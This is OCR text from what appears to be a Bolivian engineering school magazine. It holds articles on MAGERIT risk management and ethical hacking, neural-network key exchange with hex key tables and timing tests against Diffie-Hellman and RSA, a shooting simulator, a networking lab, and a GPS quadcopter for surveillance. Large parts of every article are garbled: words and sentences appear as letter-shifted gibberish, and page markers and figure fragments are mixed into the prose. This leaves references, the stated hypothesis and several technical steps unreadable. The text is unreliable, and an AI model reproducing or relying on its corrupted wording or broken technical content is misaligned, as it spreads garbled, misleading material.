riesgo residual. *VTV YLZ\S[HKV KL LZ[H L[HWH ZL PKLU[PÄJHYVU tipos de activos, en 11 áreas diferentes y dentro SHZ TPZTHZ ZL PKLU[PÄJHYVU ` ]HSVYHYVU KPZ[PU[HZ HTLUHaHZJSHZPÄJHKHZZLNUZ\VYPNLULUmYLHZ M A Figura 6: Zona de riesgos establecida según MAGERIT – version 3.0. 65 P A R Siguiendo la metodología se procede a la evaluación de riesgos y como resultado se obtuvieron 235 riesgos a tratar entre niveles Medio, Alto y Muy Alto (M/A/MA), los cuales se agruparon según el tipo de amenazas, obteniendo 33 amenazas que requieren ser tratadas con una probabilidad de ocurrencia de riesgo de 70.41%. Para elaborar el plan de seguridad que es el producto de la etapa de tratamiento se consideran 28 amenazas que se someten a mitigación, 4 se JVTWHY[LU ` ZL [YH[H WVY ÄUHUJPHJP}U +PJOV plan de seguridad se organiza en 3 tareas considerando salvaguardas, responsabilidades, tiempo de ejecución y estado de riesgo (Figura 7), este plan se entrega directamente a la organización sobre la cual se aplica el proceso de gestión de riesgos. :LM\UKHTLU[HLUSHZPTWSPJPKHKKLSJ}KPNV` retroalimentación Tomando en cuenta que el software propuesto servirá de apoyo al proceso y no será la herramienta principal para llevar a cabo el proceso de gestión de riesgos, el tiempo para el desarrollo de dicho software es limitado. ;YHZKLZHYYVSSHYSHZL[HWHZKLWSHUPÄJHJP}UKPZL|V JVKPÄJHJP}U`WY\LIHZZLNUSHTL[VKVSVNxH?7ZL obtuvo un sistema funcional (Figura 8) capaz de coadyuvar al proceso de gestión de riesgos, según se planteó anteriormente. A D Figura 7: Organización del plan de seguridad según MAGERIT –versión 3.0. I G M A 66 El proceso de gestión de riesgos debe ser monitorizado permanentemente según indica la etapa KLZLN\PTPLU[V`YL]PZP}UX\LLZWLJPÄJH4(.,90; para lo cual se plantea la realización de un sistema informático. (a) (b) Figura 8: Sistema propuesto para coadyuvar al proceso de gestion de riesgos. Ingeniería de software. Mediante la aplicación de Ethical Hacking se evidencian vulnerabilidades en un sistema, pero no W\LKLU JVUZPKLYHYZL JVTV \UH JLY[PÄJHJP}U KL que un sistema es seguro o inviolable, pero da lugar a la realización del proceso de gestión de riesgos. Pressman, R. S. (2005) expresa que la Ingeniería de Software comprende métodos, herramientas y procedimientos orientados a la construcción de un ZVM[^HYL LÄJPLU[L X\L ZH[PZMHNH SHZ ULJLZPKHKLZ requeridas. Considerando lo anteriormente citado se debe tomar en cuenta que existen diversas metodologías para el desarrollo de software, entre tradicionales y ágiles, en este estudio se considera la programación extrema (XP) por ser: <UH TL[VKVSVNxH KL KLZHYYVSSV YmWPKV X\L consta de solo 4 fases 5VZLJLU[YHLUSHKVJ\TLU[HJP}UKLSZPZ[Lma, su desarrollo es iterativo e incremental :LPU[LNYHHSJSPLU[LJVTVWHY[LKLSLX\PWV Conclusiones. El análisis de riesgos permite conocer de manera KL[HSSHKH J}TV M\UJPVUHU SVZ ZPZ[LTHZ L PKLU[PÄcar activos, amenazas, salvaguardas, niveles de impacto y riesgo del sistema de información para su posterior evaluación. Por otro lado la gestión de riesgos también establece la situación de la organización, donde se realiza este tipo de estudios, respecto a la seguridad de la información recomendando las medidas apropiadas que deberían adoptarse para controlar riesgos PKLU[PÄJHKVZ`KV[HYKLZLN\YPKHKH\UZPZ[LTHKL información. Se tiene en cuenta todos los elemen- tos que lo componen, se analiza el nivel de vulnerabilidad de cada uno de ellos ante determinadas amenazas y se valora el impacto que un ataque causaría sobre todo el sistema, apoyando a la organización en el proceso de evaluación o auditoria debido a la minimización del impacto en casos de incidentes. nómicas que pueden suscitarse, provocando una variación en cuanto al nivel de seguridad (Figura 9) A El sistema que se propone para realizar la parte de seguimiento del proceso de gestión de riesgo, coadyuva a mantener los niveles de riesgos controlados y ayuda a la implantación del plan de seguridad. Aportes y Resultados La aplicación de Ethical Hacking permite demostrar la existencia de vulnerabilidades y así se evidencia la fragilidad de la seguridad de la información. Por otra parte habiendo comprobado la fragilidad de la seguridad se da lugar a la aplicación del proceso de gestión de riesgos permitiendo establecer un plan de seguridad que reconoce a los responsables de cada actividad establecida ahí, y los tiempos que tomara su implementación. Todo esto para poder elevar el nivel de seguridad de la información YLZN\HYKmUKVSH`IYPUKmUKVSLTH`VYJVUÄHIPSPKHK El desarrollo del proceso de gestión de riesgos es oportuno, pues se ha dado importancia a lo que realmente debería tomar en cuenta para mantener un entorno seguro anticipando las pérdidas eco- P Figura 9: Variación en niveles de seguridad considerando las 5 dimensiones según MAGERIT –versión 3.0. Además se generó un sistema que permite realizar el seguimiento de los niveles de riesgos que presentó el sistema de información, previo desarrollo del proceso de gestión de riesgos. R A 9LMLYLUJPHZ)PISPVNYmÄJHZ (.<03,9( 7<90-0*(*0Ô5 Seguridad Informática. Pozuelo de Alarcón, España: Editorial Editex. (9,0;06)1(=0,9 Seguridad de la inforTHJP}U! YLKLZ PUMVYTm[PJH ` ZPZ[LTHZ KL PUMVYmación. Madrid: España. Consultado el: (14 de (IYPS=PZ[HWYL]PH!O[[W!$LZZH$?LP$ D I G M A Competencia Nacional de Programación en Santa Cruz 67 MODELO DE INTERCAMBIO DE CLAVES CRIPTOGRÁFICAS APLICANDO REDES NEURONALES ARTIFICIALES P A R A D I G M A 68 Bernardo Vargas Rivera Departamento de Ingeniería de Sistemas – Escuela Militar de Ingeniería [email protected] La Paz-Bolivia RESUMEN El presente artículo expone el desarrollo de un moKLSV KL PU[LYJHTIPV KL JSH]LZ JYPW[VNYmÄJHZ \[PSPaHUKVYLKLZUL\YVUHSLZHY[PÄJPHSLZ,STVKLSVWYLsentado se encuadra dentro de lo que se conoce comúnmente como Criptografía basada en Redes Neuronales o Criptografía Neuronal. El objetivo de este modelo es demostrar la factibilidad de un sistema de intercambio de claves sobre un canal público por medio de redes neuronales que luego podría ser utilizado por algún método de cifrado simétrico a elección. INTRODUCCIÓN Los tres conceptos básicos de criptografía incluyen el protocolo de intercambio de clave, criptografía de clave pública y criptografía de clave privada. El protocolo se encarga de la transmisión de información entre las redes de ambas partes hasta encontrar una clave secreta y compartida en común. Esta clave es luego utilizada en el cifrado/descifrado de la información transmitida. El concepto básico de un protocolo de intercambio de clave basado en redes neuronales se basa primordialmente en dos atributos clave de redes neuronales. El primero, es que dos redes neuronales conectadas sobre un canal público se sincronizarán a pesar de cada una presente muestre un comportamiento caótico. El segundo que una red externa, aunque sea idéntica a ambas partes, se LUMYLU[HYm H NYHUKLZ KPÄJ\S[HKLZ WHYH ZPUJYVUPaHY con las mismas a pesar de que se comunican sobre un canal público. (Diaz, 2012) Es por eso que se desarrolla el modelo de interJHTIPV KL JSH]LZ JYPW[VNYmÄJHZ HWSPJHUKV YLKLZ UL\YVUHSLZ HY[PÄJPHSLZ LU LZWLJxÄJV SHZ TmX\PUHZ KLmYIVSKLWHYPKHKJVULSÄUKLYLK\JPYSH]\SULrabilidad de los ataques del interceptor que consiguen información que no le pertenece. Para ello se debe generar un algoritmo que muestre las actividades que se desarrollan en cada red neuronal para obtener los mismo pesos en ambas redes neuronales. PROBLEMÁTICA En la actualidad la información es vital para muchas LTWYLZHZ X\L THULQHU KH[VZ JVUÄKLUJPHSLZ KL sus clientes y que no debe ser revelada al público. Si ésta es revelada traería muchas consecuencias negativas que reduciría el prestigio de las empresas. En la mayoría de las empresas se envía inforTHJP}UJVUÄKLUJPHSHZ\ZJSPLU[LZH[YH]tZKLS0Uternet, la cual está expuesta a cualquier interceptor que desee conseguir la información de los clientes de forma ilegal. Evitando este ataque, con la intención de conseguir SHPUMVYTHJP}UJVUÄKLUJPHS`HJJLKLYHSZPZ[LTHZL necesita que la información viaje cifrada mediante algoritmos de criptografía de una manera segura por el canal de comunicación. Otro problema es la HKTPUPZ[YHJP}U KL SHZ JSH]LZ JYPW[VNYmÄJHZ KL SVZ distintos usuarios, con las cuales se cifra y descifra la información. Es por eso que se usa el método NLULYHJP}U L PU[LYJHTIPV KL JSH]LZ JYPW[VNYmÄJHZ basado en redes neuronales, para que se generen una clave distinta cada vez que se conecte cualquier usuario. REDES NEURONALES Como técnica se utiliza un tipo especial de red neuronal denominada la máquina de árbol de paridad, la cual es una red neuronal multicapa y de alimentación hacia adelante. Una máquina de árbol de paridad consta de varios perceptrones, los cuales tienen varias neuronas de entrada y una única salida, es decir una neurona en la capa de salida. Estos perceptrones se conectan a una misma neurona de salida para mostrar el resultado. Figura 2: Máquina de Árbol de Paridad Esta red neuronal consta de una neurona de salida T, K neuronas ocultas y K * N neuronas de entrada. Las neuronas de entrada toman valores binarios: Los pesos entre las neuronas de entrada y de la capa oculta tomar los valores que se encuentran en el siguiente rango: El valor de salida de cada neurona de la capa oculta se calcula como la sumatoria de todas las multiplicaciones de las neuronas de entrada y los pesos, que tienen la siguiente formula: Signo (Signum) es una simple función, que devuelve tres valores de la siguiente manera: La salida de red neuronal se calcula como la multiplicación de todos los valores producidos de las neuronas de la capa oculta, con la siguiente formula: Paso 1: Determinación de los parámetros de las redes neuronales: K, el número de neuronas en la capa oculta; N, la cantidad de neuronas en la capa de entrada; L, el rango de los valores que tomaran los pesos de ambas redes neuronales. Esto se realiza para que ambas redes neuronales tengan la misma estructura. Paso 2: Los pesos de las redes neuronales se inician aleatoriamente. Paso 3: El arreglo de entradas es generada aleatoriamente con valores Paso 4: Calcular los valores de las neuronas ocultas Paso 5: Calcular los valores de la neurona de salida Paso 6: Comparar la salida de ambas redes neuronales. Si las salidas no son iguales, se pregunta si los pesos son iguales, si estos no los son entonces se regresa al paso 3. Caso contrario, si las salidas son iguales, se actualizan los pesos de las redes neuronales con alguna regla de aprendizaje: aprendizaje Hebbiano, aprendizaje Anti-Hebbiano o aprendizaje de Paso aleatorio. Paso 7: Repetir el proceso hasta que los pesos de ambas redes neuronales sean iguales. Seguidamente se tendrá la clave criptoNYmÄJH X\L LZ LS ]HSVY KL SVZ WLZVZ KL SHZ redes neuronales. Paso 8: Se sigue ejecutando el programa, para que el interceptor no se dé cuenta cuanKVZLVI[PLULSHJSH]LJYPW[VNYmÄJH Una vez que se determinen los parámetros, se tienen las arquitecturas de las redes neuronales. Seguidamente continúa el proceso de sincronización dentro de una red neuronal que se muestra en la ÄN\YH P A R A D I G HERRAMIENTAS La salida puede tomar dos valores: 1 y -1. Cada red neuronal obtiene su salida. Una vez obtenida, esta es comparada con la salida generada de la otra red neuronal. Cuando las redes neuronales obtienen SHTPZTHZHSPKHZLWYVZPN\LHTVKPÄJHYSVZWLZVZ con la regla de aprendizaje. ALGORITMO DE INTERCAMBIO DE CLAVE CRIPTOGRÁFICA 3VZWHZVZHZLN\PYWHYHNLULYHYSHJSH]LJYPW[VNYmÄca son los que se muestren a continuación: La aplicación se desarrolla con el software Visual Studio con el código C. Esto se debe a que las cla]LZJYPW[VNYmÄJHZZLPU[LYJHTIPHULU[YLSVZ\Z\Hrios y el servidor, que se encuentran conectados mediante el protocolo TCP/IP. M Además de que cumple con las condiciones de un modelo cliente servidor. El cliente es el usuario que manda la información que genera la red neuronal al servidor que se encuentra en la empresa JVU SH J\HS ZL PU[LYJHTIPHYm PUMVYTHJP}U JVUÄdencial. A 69 P A partir del análisis de las características, se determinará las variables que ingresaran al modelo para que la red neuronal pueda aprender. Seguidamente ZL[PLULX\LPKLU[PÄJHYSVZJHZVZKL\ZVKLSZPZ[LTH mostrando los actores involucrados. Mediante estos diagramas se puede describir el comportamiento del modelo a partir de la acciones de un usuario. Posteriormente se realizará el diagrama de robus[LaWHYHWVKLYPS\Z[YHYNYmÄJHTLU[LSHZPU[LYHJJPVnes entre los objetos participantes de un caso de uso. El análisis de robustez ayuda a saber si las esWLJPÄJHJPVULZKLSZPZ[LTHZVUYHaVUHISLZ A R Para ello se deben aplicar las siguientes reglas básicas: (J[VYLZZVSVW\LKLUJVT\UPJHYZLJVUVIQLtos interfaz. 3HZPU[LYMHJLZZVSVW\LKLUJVT\UPJHYZLJVU controles y actores. 3VZVIQL[VZLU[PKHKZVSVW\LKLUJVT\UPJHYse con controles. 3VZ JVU[YVSLZ ZL JVT\UPJHU JVU PU[LYMHJLZ objetos identidad y con otros controles pero nunca con actores. A D Diseño I Figura 3: Proceso de Sincronización de una Red Neuronal. G M A 70 METODOLOGÍA A continuación se presenta la metodología del presente trabajo de grado que consta de cuatro fases: Diagnóstico, Diseño, Implementación, Validación. Diagnóstico ,Z[HMHZLLTWPLaHJVUSHPKLU[PÄJHJP}UPUMVYTHSKL todos los requisitos que deberían ser parte del sistema, para ello se empieza con la recolección de datos mediante la observación y principalmente utilizando la elaboración de entrevista y cuestionario. Seguidamente se podrá realizar un diagrama de clases de alto nivel que muestre los obje[VZ`[VKHZZ\ZYLSHJPVULZKLÄUPKVJVTVTVKLSV de dominio. Seguidamente se realiza un prototipo rápido que muestre las interfaces del sistema para que se evalúe con los usuarios y así estén de acuerdo en que el modelo contenga las características necesarias. Después de haber analizado los requerimientos que debe presentar el modelo se pasa a la fase de KPZL|VLUSHJ\HSZLKLILLZWLJPÄJHYLSJVTWVYtamiento del modelo con la elaboración de diagramas de secuencia. Con ello se conseguirá las interacciones entre objetos desde un punto de vista temporal y se podrá ver que métodos llevaran las clases del modelo. Los diagramas de secuencia se componen de cuatro elementos que son: el curso de acción, los objetos, los mensajes y los métodos (operaciones). Con respecto a la red neuronal se tendrá que determinar cuántas entradas y salidas tendrá la misma dependiendo de las entradas que se tengan. Además se tendrá que conocer el número de neuronas y como estas están distribuidas en capas e interconectadas entre sí. En esta fase también se determinará las funciones de transferencia que se usarán. Esta fase termina cuando se adicionan los detalles del diseño en el diagrama de clases para que satisMHNH[VKVZSVZYLX\PZP[VZPKLU[PÄJHKVZ Implementación +LZW\tZKL]LYPÄJHYX\LLSKPZL|VZH[PZMHJL[VKVZ SVZYLX\PZP[VZPKLU[PÄJHKVZZLWYVZPN\LJVUSHMHZL de implementación. En ésta se utiliza el diagrama de componentes, si fuera necesario para apoyar el desarrollo. Seguidamente se generará el código del programa en el lenguaje de programación escogido. 40 3 15 87 64 e8 d7 e7 13 4b 53 ee 77 d0 df 9e 77 ea 41 8d 84 67 dc ed ae e1 8f 7f 2 43 65 2 11 33 9c Una vez diseñada la arquitectura de la red neuronal y que el código esté terminado, se tiene que entrenar a la red para que aprenda el comportamiento X\LKLIL[LULYJVULSÄUKLX\LWYVWVYJPVULSHYLZW\LZ[HHKLJ\HKHHSHJVUÄN\YHJP}UKLSVZWH[YVULZ de entrada. 10 20 5 35 46 66 f 9e 8c f7 4e 6a 67 74 49 de 69 41 28 1d f3 40 99 bb 8f b8 92 3a a d3 37 2b 7 9d 98 50 5 3 62 be ac 6f 18 ce eb 3c c3 b4 bd 7d de 3c a4 55 dd f6 1 6c 2d 86 63 ff d2 fe 10 93 b7 55 c4 d2 Validación Finalmente se tienen que realizar la aceptación de los resultados mediante las distintas pruebas escogidas, que son las siguientes: prueba de unidad, prueba de tiempo de desarrollo, prueba de integración, prueba de sistema y la prueba de aceptación. Después de que la red aprenda los ejemplos en el juego de ensayo, deberá ser capaz de responder de una manera correcta cuando se le presentes nuevas entradas. En el juego de ensayo no se podrá incluir una gran colección de hechos. Es por eso que se requiere seleccionar hechos que representen claramente cada uno de los patrones a reconocer y las situaciones extremas de evaluación. Se concluirá esta fase con realización de la prueba de hipótesis que determinará si la hipótesis es una HÄYTHJP}UYHaVUHISL Tabla 1: Ingreso de Parámetros Distintos y la GeULYHJP}UKL*SH]L*YPW[VNYmÄJH Parámetros (Entradas) Después de realizar la validación del moledo neuronal se obtuvieron los resultados esperados, las claves generadas de acuerdo a los pesos igualados de las redes neuronales. Primeramente se muestra en la tabla 1 la generaJP}UKLJSH]LZJYPW[VNYHÄJHZJVUKPZ[PU[VZWHYmTLtros de las redes neuronales y después en la tabla 2 se puede observar las claves generadas mediante redes neuronales con los mismos parámetros. Parámetros (Entradas) Salidas Neuronas Neuronas Entrantes Ocultas Rango de Pesos 10 5 3 1c 17 9 94 a6 fe 2f 71 c2 93 ab d3 65 a8 d8 7f df f7 88 c9 95 51 a ab 96 fb 4a a 10 3 5 19 a8 9b de 50 36 64 8b 7e 5f 8c 2a 42 89 89 dc 5d b9 ad 86 da 16 66 7e f5 ed 53 d7 20 ed db 2d *SH]L*YPW[VNYmÄJH A R Salidas Neuro-nas Neuronas Entrantes Ocultas Rango de Pesos 20 5 10 ca e9 82 8c a6 ee 2a 8e 4c 86 da bb a6 40 a2 99 75 f0 54 c7 b0 a bb c2 3d 2f 3d 69 9f 80 51 cb 20 5 10 95 67 3b 47 10 b8 f4 be 9a 55 c8 ec bc b3 fb 3d a1 96 43 5c 8f b6 95 51 d1 12 12 29 ea cf e8 f 20 5 10 62 46 48 f5 9b 67 38 c8 62 68 b0 28 d ac 82 2b 23 48 b8 ab c6 d3 20 5 49 37 51 9 b 27 63 c4 7e 20 5 10 6f c2 e3 d4 61 a2 3e b7 2 bc 32 cf ff f0 37 23 98 6 72 c4 d8 bb 4c e6 f1 b1 57 8 c c 50 9f 37 20 5 10 fc e5 6 cb 3c bd 67 89 21 a7 f1 73 23 a5 13 75 c0 2e 7f da 55 1 c0 62 28 27 54 5 1 21 4f a4 e9 RESULTADOS P *SH]L*YPW[VNYmÄJH Tabla 2: Ingreso de Parámetros Iguales y la GeneYHJP}UKL*SH]L*YPW[VNYmÄJH COMPROBACIÓN DE LA HIPOTESIS Hipótesis: “El modelo de intercambio de claves JYPW[VNYmÄJHZIHZHKVLUYLKLZUL\YVUHSLZHY[PÄJPHles permite incrementar la velocidad de intercambio de claves de manera segura, contribuyendo a disminuir la vulnerabilidad a los ataques del interceptor que violan la seguridad de información” A D I G M A 71 P A R Prueba de Hipótesis CONCLUSION Una métrica para probar la hipótesis es el tiempo LU LS J\HS ZL PU[LYJHTIPHU SHZ JSH]LZ JYPW[VNYmÄcas. En este caso se comparará los algoritmos DiMÄL/LSSTHU`9:(X\LZPY]LWHYHPU[LYJHTIPHYJSHves, con el algoritmo propuesto basado en redes neuronales. 7HYHLSPU[LYJHTIPVKLJSH]LZJYPW[VNYmÄJHZLU[YL dos partes existe el protocolo mas utilizado que es LS+PMÄL/LSSTHU,Z[LHSNVYP[TVLZZLN\YVWVYSH complejidad de su funcionamineto. Sin embargo presenta una serie de debilidades: Seguidamente se realizó 50 corridas para cada uno KLLZ[VZTt[VKVZJVULSÄUKLVI[LULYSVZ[PLTWVZ de generación e intercambio de la clave criptográÄJH=LY;HISH Tiempo de ejecución de Intercambio de la Clave Crip[VNYmÄJHZLN\UKVZ Ejecución A *YPW[VNYHÄH Algoritmo Neuronal +PMÄL/LSSTHU Algoritmo RSA Sumatoria 7,606 24,295 12,099 Media 0,15212 0,4859 0,24198 Tabla 3: Tiempo de Ejecución de Intercambio de *SH]L*YPW[VNYmÄJH D I G M A 72 *VTWHYHJP}ULU[YLTVKLSVWYVW\LZ[V`+PMÄL/Lllmann H0: La media del tiempo de intercambio de claves perteneciente al modelo de redes neuronales es igual a la media del tiempo de intercambio de cla]LZWLY[LULJPLU[LHSHSNVYP[TV+PMÄL/LSSTHUU H1: La media del tiempo de intercambio de claves perteneciente al modelo de redes neuronales es menor a la media del tiempo de intercambio de cla]LZWLY[LULJPLU[LHSHSNVYP[TV+PMÄL/LSSTHUU Luego se calcula el valor de Z: Después de realizar el cálculo de Z, se comprueba si se encuentra dentro de la región crítica. Se debe rechazar la hipótesis nula H0, porque el valor Z obtenido pertenece a la región crítica. Entonces, se acepta la hipótesis H1. ,Z[HL_W\LZ[VHSH[HX\LKL0U[LYJLWJP}ULU el que algun interceptor puede suplantar la identidad de la parte B mientras se comunica JVUSHWHY[L(JVULSÄUKLYL[YHUZTP[PYTLUsajes de A a B y biseversa 6[YV WYVISLTH LZ X\L YLX\PLYL \U LSL]HKV número de cálculos, como ser: factorización de primos o el uso de logaritmo discreto. Existe otro metodo que es el uso de maquinas de árbol de paridad, las cuales deben ser sincronizadas para obtener los mismos pesos, con los cuales ZL NLULYHU SHZ JSH]LZ JYPW[VNYmÄJHZ TLKPHU[L SH M\UJP}U/HZO:OHJVULSÄUKLZLY\[PSPaHKVZ por el algoritmo de criptografía AES para cifrar textos como también descifrarlos. Es por eso que este nuevo método podría ser un YLLTWSHaVLÄJHa`ZLN\YVWHYHV[YVZTt[VKVZX\L J\LU[H JVU SH ZLN\YPKHK Z\ÄJPLU[L WHYH X\L H \U PU[LYJLW[VY SL ZLH KPÄJPS JVUZLN\PY SH PUMYVTHJP}U JVUÄKLUJPHS REFERENCIAS BIBLIOGRAFICAS +PHa 4 Protocolo de intercambio de claves utilizando redes neuronales y sincronización caótica. 2HU[LY02PUaLS>Cryptography based on neural networks. Würzburg. 3\JLUH 4 Criptografía y Seguridad en Computadores. 4VYHLZ + 9 Troca de Chaves CriptoNYmÄJHZ\[PSPaHUKV*YPW[VNYHMxH5L\YHS. Marília. 9\[[VY ( Neural Synchronization and Cryptography. Obtenido de http://arxiv.org/ pdf/0711.2411.pdf 9\[[VY(>VSMNHUN2Neural Cryptography with feedback. Würzburg. :LVHUL-Probabilistic Attack on Neural Cryptography. Berlin. PROYECTOS DE LA CARRERA SIMULACIÓN TÁCTICA Y PRÁCTICA DE TIRO EN INSTITUCIONES MILITARES. Ing. Germán Pereira Muñoz Departamento de Ingeniería de Sistemas – Escuela Militar de Ingeniería Irpavi (La Paz) Bolivia Se está desarrollando un sistema electrónico para un simulador de prácticas de tiro sobre una plataforma virtual en PC en instituciones militares con sensores. Este proyecto nace por la falta de prácticas de tiro, que hace imprecisos en su puntería a los soldados. Realizando una investigación sobre las herramientas utilizadas en otros países, se pudo deducir el uso de simuladores para aumentar la potencia de su ejército. Todo ejército tiene horas de práctica de tiro para los soldados, estas indican un costo elevado para el país, por lo que con ayuda de la tecnología podemos realizarlas de manera virtual, ejecutándolas para mayor cantidad de soldados y tiempo. La mejora de prácticas de tiro para los soldados, con experiencia en precisión. Prácticas de tiro realizadas de manera manual El objetivo principal es aumentar la práctica de tiro en instituciones militares y lograr una mayor práctica de tiro antes de ir al polígono. Simular todas las condiciones para que un soldado reciba una instrucción completa. P A R A D I G El simulador para prácticas de tiro aborda dos aspectos importantes que son: )HQHKLJVZ[VZWHYHKPJOHZWYmJ[PJHZ 4H`VY [PLTWV KL MVYTHJP}U LU PUZ[Y\JJP}U KL tiro. Este simulador se implementaría de forma directa a toda instrucción a todo nivel, es decir, que los alumnos, cadetes y cualquier soldado podrían realizar su práctica, aumentando la precisión y experiencia de tiro. El sistema electrónico que se plantea se encuentra ya funcional en su segunda versión en prototipo como se ve en las siguientes imagenes: M A 73 P A R A D I LABORATORIOS DE REDES Y ROBÓTICA La implementación del diseño curricular basado en competencias, que en la presente gestión empezó con el primer año y en el 2014 continuará con el segundo año y así sucesivamente, implica la formación de los estudiantes no solo con énfasis en los fundamentos teóricos de las asignaturas, sino fundamentalmente en el saber hacer y saber ser, es decir, requiere que la Carrera disponga de laboratorios de última generación que posibiliten una plena vigencia del nuevo plan de estudios. Con este propósito, la jefatura de Carrera, a cargo del Tcnl. Julio César Narváez Tamayo, ha elaborado los proyectos para la adquisición e implementación de los laboratorios de Redes y de Robótica, los cuales han sido aprobados por las autoridades superiores de la EMI y se incorporaron al POA de la gestión 2013, realizándose la respectiva licitación pública. La empresa Alpha Systems se adjudicó el laboratorio de Redes, entregó los equipos CISCO, marca líder del mercado, estando a la fecha en proceso de prueba para el inicio de actividades a partir del mes de enero de 2014. El laboratorio de Redes fue inaugurado por autoridades superiores de la EMI, con la denominación de “MSc. Fernando Yañez Romero”, en homenaje y agradecimiento al prestigioso profesional, docente emérito de la EMI y de la UMSA, que durante 20 años de trabajo contribuyó a que la Carrera se consolide como una de las mejores del país Tcnl. Narváez en palabras de circunstancia A 74 Participantes del acto inaugural El laboratorio de Robótica continúa en proceso de licitación, teniéndose prevista su adjudicación an[LZ KL ÄU KL H|V 3VZ LX\PWVZ KL LZ[L SHIVYH[Vrio serán de última generación y permitirán que los estudiantes adquieran competencias profesionales en el área de robótica y automatización. Asimismo apoyarán a la maestría en robótica y automatización que será una alternativa de formación de postgrado para los egresados de la Carrera Ambos laboratorios serán administrados por la Carrera, pudiendo ser utilizados por otras Carreras de la EMI y por el postgrado. G M El laboratorio de Redes cuenta con equipos de última generación que permitirán dotar a los estudiantes de competencias para el ejercicio profesional idóneo. El laboratorio tiene múltiples potenciales aplicaciones extracurriculares, tales como permitir a la EMI constituirse en una Academia de Networking de Cisco, así como prestar servicios a otras entidades, en el área de redes y comunicaciones. Lic. Yañez agradece la nominación DESARROLLO DE UN ALGORITMO DE CONTROL PARA UN VEHICULO NO TRIPULADO UTILIZANDO LA TECNOLOGIA GPS Ing. German Pereira Muñoz Est. Diego Bruno Flores Salazar Est. Alex Ariel Orellana Ramirez Departamento de Ingeniería de Sistemas – Escuela Militar de Ingeniería La Paz - Bolivia RESUMEN Modelar, desarrollar e implementar el algoritmo de control de un vehículo aéreo multirotor no tripulado, utilizando la tecnología GPS para realizar vuelos de búsqueda, reconocimiento y vigilancia para disminuir la inseguridad ciudadana en la zona de Irpavi.. ANTECEDENTES Según las revistas de victimización en Bolivia de la ONSC En las ciudades del eje central, 4 de cada 10 hogares (44%) fueron víctimas de al menos un delito en los últimos 12 meses (robo, hurto, robo de vehículos, robo de autopartes, robo en vivienda y violencia). [ONSC; 2012] Como se puede observar en la Figura 1., los resultados de la encuesta revelan altos niveles de victimización en las cuatro ciudades, pero los mayores se presentan en Cochabamba, donde más de 5 hogares de cada 10 han pasado por la experiencia de un delito o un hecho de violencia, y en El Alto esta experiencia afectó a un poco menos de 5 de cada 10 hogares. En términos generales, La Paz y Santa Cruz presentan niveles de victimización menores al total de hogares victimizados. En ambas, la actividad delictiva afectó a 1 hogar menos que en Cochabamba y El Alto durante los últimos doce meses. En términos porcentuales, La Paz presenta un 17,6% menos de hogares víctimas que en Cochabamba y Santa Cruz un 16,7%. [ONSC; 2012] La Alcaldía mayor de Bogotá adelanta un plan piloto para determinar si integra al sistema de seguridad local el uso de Vehículos Aéreos no Tripulados (VANT), también conocidos como DRONES. “Además nos ayudarán con los mapas y la cartografía, en la vigilancia de proliferación de residuos, en la LÄJPLUJPHKLSHYLJVSLJJP}UKLHZLV`LULSZLN\Pmiento al daño ecológico”, indico el alcalde de Bogotá. [WEB 03; EL TIEMPO; 2013] Michael Bloomberg 2013, alcalde de Nueva York, lo tiene claro: la seguridad es lo primero y por este motivo no va a escatimar en esfuerzos para lograrla. El mandatario asume también que hay que adaptarse a los nuevos tiempos y en este sentido, en una entrevista radiofónica, no ha dudado en aseverar que los DRONES de vigilancia “son inevitables” en la ciudad estadounidense, y que más vale que nos vayamos acostumbrando. Bloomberg ha querido atajar de esta manera las posibles polémicas en torno a la privacidad: “¿Cual es la diferencia entre una JmTHYHÄQHLU\ULKPÄJPV`\U+965,ZVIYL]VSHUKV la ciudad? “, se pregunta, para luego continuar “nos adentramos en un mundo diferente y hay cosas que no se pueden evitar”. [WEB 04; ENGADGET; 2013] 1\Z[PÄJHJP}UKLS[LTH ,S KLZHYYVSSV KLS WYV`LJ[V ZL Q\Z[PÄJH KL THULYH PUZ[P[\JPVUHS KLIPKV HS ILULÄJPV X\L WYL[LUKL HScanzar no únicamente al campo de la vigilancia, sino al control autónomo y la aplicación de los UAV enfocando en primera instancia un área de aplicación y posteriormente se recomienda la investigaJP}U ` KLZHYYVSSV WHYH KP]LYZPÄJHY SHZ HJ[P]PKHKLZ del UAV. Desarrollo del tema Diagramas de Bloques del Cuadracóptero Figura 1: [Primera revista de Victimización de la ONSC] A continuación se presenta el diagrama de bloques a grandes rasgos con el cual se va proceder con P A R A D I G M A 75 P A el modelado del cuadracóptero desarrollado. Cada uno de los bloques representa un subsistema que será diseñado y validado por aparte, para luego formar parte de todo el sistema. Esto permite segmentar el proyecto en diversas etapas las cuales hacen que la validación y la puesta en funcionamiento de cada una de ellas resulte más accesible al desarrollador. <UH]LaJVUÄN\YHKVLSMYHTL`HQ\Z[HKVZSVZTV[VYLZ ZL WYVJLKL H \UH ]LYPÄJHJP}U KL JHYNH [PS por cada rotor utilizado, por otra parte se debe implementar los controladores de velocidad (uno por cada rotor) R A D Cabe aclarar que el cuadracóptero que construido, ZLKPZL|}LUJVUÄN\YHJP}U¸_¹ Construcción del Quadcopter La construcción se basa en un soporte de aluminio LUMVYTHKL¸/¹JVTVZLW\LKLVIZLY]HYLUSHÄN\YHSHJVUÄN\YHJP}UKLS}NPJHLZ¸?¹ Una vez concluida las pruebas de cada rotor se coULJ[H HS JVU[YVSHKVY WVZ[LYPVYTLU[L ZL JVUÄN\YH LSJVU[YVSHKVYZLNUSHZLZWLJPÄJHJPVULZKLSMHIYPcante. I G Se realiza la determinación de la posición que ocupara el controlador: M Conclusiones La construcción de un vehículo aéreo no tripulado como puede observarse no es complicada, los ámbitos de aplicación son variados, desde aplicaciones civiles. A 76 :LKL[LYTPUHLS[PWVKLJVUÄN\YHJP}UKLSVZYV[Vres. 7HYH VI[LULY \UH JVUÄHIPSPKHK Z\WLYPVY ZL ULJLsita el desarrollo de distintas pruebas en diferentes ambientes. INSTITUCIONALIZACIÓN DE LAS JORNADAS DE LA CARRERA DE INGENIERÍA DE SISTEMAS Ing. Freddy Medina Miranda Departamento Ingeniería de Sistemas – Escuela Militar de Ingeniería Irpavi (La Paz) Bolivia Telf.: 71520811 e-mail: [email protected] RESUMEN OBJETIVOS En el Artículo se presenta los antecedentes, objetivos, actividades y la organización, que constituyen los elementos para la institucionalización de las Jornadas de la Carrera de Ingeniería de Sistemas. Las Jornadas de la Carrera tienen los objetivos siguientes: - ABSTRACT The article presents the background, objectives, activities and the organization, which constitute elements for the institutionalization the “Jornadas” of the systems engineering career. ANTECEDENTES La Carrera de Ingeniería de Sistemas fue creada mediante Resolución Nº 